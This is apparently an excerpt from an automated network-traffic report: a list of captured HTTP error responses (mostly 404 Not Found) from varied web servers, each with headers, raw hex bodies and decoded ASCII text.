            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:58:26 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 181Keep-Alive: timeout=15, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 4b 0f 82 30 10 84 ef fc 8a 95 bb 2c 1a 8e 4d 0f f2 88 24 88 c4 94 83 47 4c d7 94 04 69 a5 c5 c7 bf 97 c7 c5 e3 ec cc 37 b3 6c 93 9c 63 71 ad 52 38 8a 53 01 55 7d 28 f2 18 fc 2d 62 9e 8a 0c 31 11 c9 ea ec 83 10 31 2d 7d ee 31 e5 1e 1d 67 8a 1a 39 09 d7 ba 8e 78 14 46 50 6a 07 99 1e 7b c9 70 3d 7a 0c 97 10 bb 69 f9 9d b9 1d ff cb 4c ca 63 86 0b 45 30 d0 73 24 eb 48 42 7d 29 00 db 5e d2 27 30 ca c0 bb b1 d0 4f c8 7d 46 40 f7 e0 54 6b c1 d2 f0 a2 21 60 68 e6 89 a5 7c aa 9b 9f f2 7e 74 46 9f df cf 00 00 00 Data Ascii: MK0,M$GLi7lcqR8SU}(-b11-}1g9xFPj{p=ziLcE0s$HB})^'0O}F@Tk!`h|~tF
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Sun, 23 Oct 2022 15:58:27 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 1672Content-Type: text/html; charset=utf-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:58:27 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:58:27 GMTContent-Length: 271Content-Type: text/html; charset=iso-8859-1Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 16:46:55 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun Oct 23 21:58:27 2022Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sun, 23 Oct 2022 15:58:29 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 18:00:30 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=180, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:58:30 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 182Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 4b 0f 82 30 10 84 ef fc 8a 95 bb 2c 1a 8e 4d 0f f2 88 24 88 c4 94 83 47 4c d7 94 04 69 85 e2 e3 df 5b e0 e2 71 66 67 be 1d b6 49 ce b1 b8 56 29 1c c5 a9 80 aa 3e 14 79 0c fe 16 31 4f 45 86 98 88 64 bd ec 83 10 31 2d 7d ee 31 65 1f 1d 67 8a 1a e9 84 6d 6d 47 3c 0a 23 28 b5 85 4c 4f bd 64 b8 9a 1e c3 25 c4 6e 5a 7e e7 de 8e ff 65 9c f2 98 e1 42 11 0c f4 9c 68 b4 24 a1 be 14 80 6d 2f e9 13 18 65 e0 dd 8c d0 3b ec 7d c6 82 ee c1 aa 76 84 91 86 17 0d 01 43 e3 08 b8 c0 dd a7 79 94 f7 03 74 46 9f df cf 00 00 00 Data Ascii: MK0,M$GLi[qfgIV)>y1OEd1-}1egmmG<#(LOd%nZ~eBh$m/e;}vCytF
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:58:30 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 23 Oct 2022 15:58:30 GMTContent-Type: text/htmlContent-Length: 3332Connection: keep-aliveETag: "60c1d6af-d04"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 31 30 42 39 38 31 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 18:31:28 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:58:33 GMTServer: ApacheAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE, PUTAccess-Control-Max-Age: 1000Access-Control-Allow-Headers: x-requested-with, Content-Type, origin, authorization, accept, client-security-tokenContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:58:33 GMTServer: Apache/2.4.10 (Debian)Content-Length: 292Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 38 3a 33 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 76 70 73 34 30 30 32 33 38 2e 6f 76 68 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at 127.0.0.1 Port 80</address></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:58:33 GMTServer: Apache/2.4.10 (Debian)Content-Length: 309Conn
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 345Date: Sun, 23 Oct 2022 15:58:32 GMTServer: lighttpd/1.4.45Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 